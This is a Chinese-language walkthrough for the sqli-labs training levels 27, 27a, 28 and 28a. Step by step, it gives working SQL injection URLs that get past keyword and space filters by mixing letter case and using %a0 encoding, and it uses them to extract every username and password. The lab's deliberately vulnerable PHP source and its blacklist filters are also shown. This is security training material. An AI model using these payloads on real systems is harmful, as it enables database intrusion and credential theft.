2. 程式人生 > 資料庫 >sqli-labs 通關指南:Less 27、28

sqli-labs 通關指南:Less 27、28

阿新 發佈:2020-11-08

Less 27 和 Less 28 都涉及到了對 “SELECT” 和 “UNION” 的過濾,根據情況我們可以採用大小寫過濾或者用其他編碼打亂過濾的句式。

目錄

Less 27

GET-Error Based-All your UNION & SELECT belong to us(基於錯誤的過濾了 union 和 select 的注入)

判斷注入型別

注入正常的引數,網頁返回對應 id 的正常資訊。單引號沒有被過濾,使用兩個單引號分別閉合前後的引號。網頁回顯正常的內容,說明該網頁存在單引號閉合的字元型注入。

?id=1''


測試以下所有的引數,這次 “OR”、“AND” 沒被過濾,不過所有的註釋符和空格還是被過濾了。

?id=1'#
?id=1'/*
?id=1'/
?id=1'\

獲取資料庫資訊

此處可以使用 updatexml() 報錯注入,也可以使用 URL 編碼來代替空格後用 UNION 注入。判斷有幾列可用,別忘了 “ORDER” 中的 “or” 被過濾掉了。

?id=1'%a0ORDER%a0BY%a03||'1'='1


判斷回顯位置,注意該注入返回了錯誤資訊。從提示可以看到,“SELECT” 和 “UNION” 統統被過濾了。

?id=9999'%a0UNION%a0SELECT%a01,2,3%a0or%a0'1'='1


可以使用大小寫繞過來繞過過濾機制,也就是使用的 “SELECT” 和 “UNION” 是大小寫混雜的。

?id=9999'%a0UNiON%a0SElECT%a01,2,3%a0or%a0'1'='1


爆資料庫名。

?id=9999'%a0UNiON%a0SELeCT%a01,database(),3%a0or%a0'1'='1


爆表名。

?id=9999'%a0UNiON%a0SELeCT%a01,group_concat(table_name),3%a0FROM%a0information_schema.tables%a0WHERE%a0table_schema = 'security'%a0or%a0'1'='2


爆欄位名。

?id=9999'%a0UNiON%a0SELeCT%a01,group_concat(column_name),3%a0FROM%a0information_schema.columns%a0WHERE%a0table_schema='security'%a0AND%a0table_name='users'%a0or%a0'1'='2

獲取目標資訊

獲取所有使用者名稱和對應的密碼。

?id=9999'%a0UNiON%a0SELeCT%a01,group_concat(concat_ws(":",username,password)),3%a0FROM%a0users%a0WHERE%a0'1

關卡原始碼

SQL 查詢語句

//fiddling with comments
$id = blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint = $id;

// connectivity 
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
      echo "<font size='5' color= '#99FF00'>";	
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}
else 
{
      echo '<font color= "#FFFF00">';
      print_r(mysql_error());
      echo "</font>";  
}

過濾函式

可以看到 “UNION” 和 “SELECT” 都被過濾了,不過過濾是區分大小寫的,所以使用大小寫繞過可行。

function blacklist($id)
{
      $id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
      $id= preg_replace('/[--]/',"", $id);		//Strip out --.
      $id= preg_replace('/[#]/',"", $id);			//Strip out #.
      $id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
      $id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
      $id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
      $id= preg_replace('/union/s',"", $id);	    //Strip out union
      $id= preg_replace('/select/s',"", $id);	    //Strip out select
      $id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
      $id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
      $id= preg_replace('/Union/s',"", $id);	    //Strip out Union
      $id= preg_replace('/Select/s',"", $id);	    //Strip out select
      return $id;
}

Less 27a

GET-Blind Based All your UNION & SELECT belong to us(基於盲注的過濾了 union 和 select 的注入)

判斷注入型別

注入正常的引數,網頁返回對應 id 的正常資訊。單引號沒有被過濾,無論使用幾個單引號閉合網頁回顯正常的內容,說明不是用單引號閉合。

?id=1'


注入雙引號,網頁無任何回顯。

?id=1"


注入兩個雙引號閉合,網頁回顯正常資訊,說明此處存在雙引號閉合的字元型盲注。

?id=1""

獲取資料庫資訊

除了閉合的符號不同,其他的和 Less 27 一樣。判斷有幾列可用。

?id=1"%a0ORDER%a0BY%a03or%a0"1"="1


判斷回顯位置。

?id=9999"%a0UNiON%a0SElECT%a01,2,3%a0or%a0"1"="1


爆資料庫名。

?id=9999"%a0UNiON%a0SELeCT%a01,database(),3%a0or%a0"1"="1


爆表名。

?id=9999"%a0UNiON%a0SELeCT%a01,group_concat(table_name),3%a0FROM%a0information_schema.tables%a0WHERE%a0table_schema = 'security'%a0or%a0"1"="2


爆欄位名。

?id=9999"%a0UNiON%a0SELeCT%a01,group_concat(column_name),3%a0FROM%a0information_schema.columns%a0WHERE%a0table_schema='security'%a0AND%a0table_name='users'%a0or%a0"1"="2

獲取目標資訊

獲取所有使用者名稱和對應的密碼。

?id=9999"%a0UNiON%a0SELeCT%a01,group_concat(concat_ws(":",username,password)),3%a0FROM%a0users%a0WHERE%a0"1

關卡 SQL 查詢語句

//fiddling with comments
$id = blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint = $id;
$id = '"' .$id. '"';

// connectivity 
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
      echo "<font size='5' color= '#99FF00'>";	
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}
else 
{
      echo '<font color= "#FFFF00">';
      //print_r(mysql_error());
      echo "</font>";  
}

Less 28

GET-Error Based-All your UNION & SELECT belong to us String-Single quote with parenthesis(基於錯誤的有括號的單引號過濾了 union 和 select 等字元型注入)

判斷注入型別

注入正常的引數,網頁返回對應 id 的正常資訊。單引號沒有被過濾,使用兩個單引號閉合返回正常的資訊。

?id=1''


進一步測試閉合型別,使用單引號和括號閉合回顯正常的資訊,說明網頁是使用單引號和括號進行閉合。

?id=1') OR ('1

獲取資料庫資訊

除了閉合的符號不同,其他的和 Less 27 一樣。判斷有幾列可用。

?id=1')%a0ORDER%a0BY%a03%a0or%a0('1')=('1


判斷回顯位置。

?id=9999')%a0UNiON%a0SElECT%a01,2,3%a0or%a0('1')=('1


爆資料庫名。

?id=9999')%a0UNiON%a0SELeCT%a01,database(),3%a0or%a0('1')=('1


爆表名。

?id=9999')%a0UNiON%a0SELeCT%a01,group_concat(table_name),3%a0FROM%a0information_schema.tables%a0WHERE%a0table_schema = 'security'%a0or%a0('1')=('2


爆欄位名。

?id=9999')%a0UNiON%a0SELeCT%a01,group_concat(column_name),3%a0FROM%a0information_schema.columns%a0WHERE%a0table_schema='security'%a0AND%a0table_name='users'%a0or%a0('1')=('2

獲取目標資訊

獲取所有使用者名稱和對應的密碼。

?id=9999')%a0UNiON%a0SELeCT%a01,group_concat(concat_ws(":",username,password)),3%a0FROM%a0users%a0WHERE%a0('1

關卡原始碼

關卡 SQL 查詢語句

//fiddling with comments
$id = blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint = $id;

// connectivity 
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
      echo "<font size='5' color= '#99FF00'>";	
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}
else 
{
      echo '<font color= "#FFFF00">';
      //print_r(mysql_error());
      echo "</font>";  
}

過濾函式

過濾了 “union select” 的句式,因此此處大小寫繞過沒有用,而是需要用 URL 編碼代替空格。

function blacklist($id)
{
      $id = preg_replace('/[\/\*]/',"", $id);				//strip out /*
      $id = preg_replace('/[--]/',"", $id);				//Strip out --.
      $id = preg_replace('/[#]/',"", $id);					//Strip out #.
      $id = preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
      //$id = preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
      $id = preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
      $id = preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.
      return $id;
}

Less 28a

GET-Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis(基於盲注的有括號的單引號過濾了 union 和 select 等字元型注入)

判斷注入型別

注入正常的引數,網頁返回對應 id 的正常資訊。單引號沒有被過濾,使用一個單引號閉合無回顯。

?id=1'


使用兩個單引號閉合回顯正常,說明此處存在單引號閉合的盲注。

?id=1''


進一步測試閉合型別,使用單引號和括號閉合回顯正常的資訊,說明網頁是使用單引號和括號進行閉合。

?id=1') OR ('1

獲取資料庫資訊

注入過程和 Less 28 完全一樣。判斷有幾列可用。

?id=1')%a0ORDER%a0BY%a03%a0or%a0('1')=('1


判斷回顯位置。

?id=9999')%a0UNiON%a0SElECT%a01,2,3%a0or%a0('1')=('1


爆資料庫名。

?id=9999')%a0UNiON%a0SELeCT%a01,database(),3%a0or%a0('1')=('1


爆表名。

?id=9999')%a0UNiON%a0SELeCT%a01,group_concat(table_name),3%a0FROM%a0information_schema.tables%a0WHERE%a0table_schema = 'security'%a0or%a0('1')=('2


爆欄位名。

?id=9999')%a0UNiON%a0SELeCT%a01,group_concat(column_name),3%a0FROM%a0information_schema.columns%a0WHERE%a0table_schema='security'%a0AND%a0table_name='users'%a0or%a0('1')=('2

獲取目標資訊

獲取所有使用者名稱和對應的密碼。

?id=9999')%a0UNiON%a0SELeCT%a01,group_concat(concat_ws(":",username,password)),3%a0FROM%a0users%a0WHERE%a0('1

關卡 SQL 查詢語句

//fiddling with comments
$id = blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint = $id;

// connectivity 
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
      echo "<font size='5' color= '#99FF00'>";	
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}
else 
{
      echo '<font color= "#FFFF00">';
      //print_r(mysql_error());
      echo "</font>";  
}

相關推薦

sqli-labs 通關指南Less 2728

Less 27Less 28 都涉及到了對 “SELECT” 和 “UNION” 的過濾,根據情況我們可以採用大小寫過濾或者用其他編碼打亂過濾的句式。

sqli-labs 通關指南Less 293031

Less 293031 都使用了 WAF 進行引數過濾,此處我們需要對 WAF 進行繞過再進行注入。可以使用 HPP 引數汙染攻擊,繞過 WAF 之後的注入過程和 Less 1 一樣。

sqli-labs 通關指南Less 38 ~ 41

Less 38 ~ 41 雖然使用 Less 1 的方式注入即可注入成功,但是這 4 關存在堆疊注入漏洞。我們可以使用 “;” 閉合第一個 SQL 語句,然後在後面執行任意的 SQL 語句,通過這個漏洞我們可以對資料庫執行任意的操作。

sqli-labs通關Less 1-4

sqli-labs通關Less 1-4 實驗工具phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意sqli-labs-master配置正確的情況下,建立實驗資料庫出錯,可能是由於php版本造成,可試著更改其版本

DVWA 通關指南Brute Force (爆破)

目錄Brute Force (爆破)Low Level原始碼審計滲透方法Medium Level原始碼審計滲透方式High Level原始碼審計滲透方式Impossible Level參考資料

DVWA 通關指南File Inclusion(檔案包含)

目錄File Inclusion(檔案包含)Low Level原始碼審計攻擊方式Medium Level原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

DVWA 通關指南File Upload(檔案上傳)

目錄File Upload(檔案上傳)Low Level原始碼審計攻擊方式原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

DVWA 通關指南SQL Injection (SQL 注入)

目錄SQL Injection (SQL 注入)Low Level原始碼審計攻擊方法判斷注入型別判斷幾列可控獲取表中的欄位名獲取目標資訊Medium Level原始碼審計攻擊方式判斷注入型別判斷幾列可控獲取表中的欄位名獲取目標資訊High Level原

PMP考後指南成績查詢電子證書下載都在這裡!

9月的PMP考試已經告一段落! 首先恭喜同學們終於熬過了艱難的備考時期,不過老師也知道等待成績的過程也很煎熬!

閒魚釋出 2021 創業避雷指南奶茶店咖啡館花店居前三,相關商品轉讓最多

5 月 14 日訊息 今天,閒魚釋出了《2021 創業避雷指南》,作為活躍的閒置交易平臺,閒魚上的轉賣資料側面反映了人們的創業成功率。

寧德時代祭出“春節致富指南沒有套路月入過萬

12 月 13 日訊息,據上海證券報社,近日,寧德時代在官方招聘賬號“CATL 工人招聘中心”釋出其春節堅守崗位獎勵政策,並將其稱為“致富指南”,表示“上的越多獎金越多收入越多”。CATL 工人招聘中心微信公眾號

Sqli-Labs Less12POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯222\") 猜測查詢語句 select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19 方

sqli-labs less-8(布林盲注)

less-8 布林盲注 首先利用?id=1\' and 1=1 --+和?id=1\' and 1=2 --+確定id的型別為單引號\'\'包裹。然後進行盲注。

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

less-10 in sqli-labs

Less-10 延遲注入[ ” ] 先進行注入點的測試,發現試過很多回顯都是一樣的,當嘗試到?id=1\" and sleep(5) --+,發現頁面在遲緩後有回顯,猜測是基於\"的時間盲注,盲註腳本和less-9基本一樣,改下url就行。

sqli-labs通關payload

 less-1:  less-2:  less-3:  less-4:  less-5:  less-6:  

sqli-labs less 6

技術標籤sqli-labsmysql安全 一輸入id,回顯正常 127.0.0.1/sqli-labs-master/Less-6/?id=1

sqli-labs less 13

13關的話也沒有什麼特殊的,和十二關的順序啊payload啊一模一樣,不過13關的閉合方式是’),所以直接參考12就好了 12連結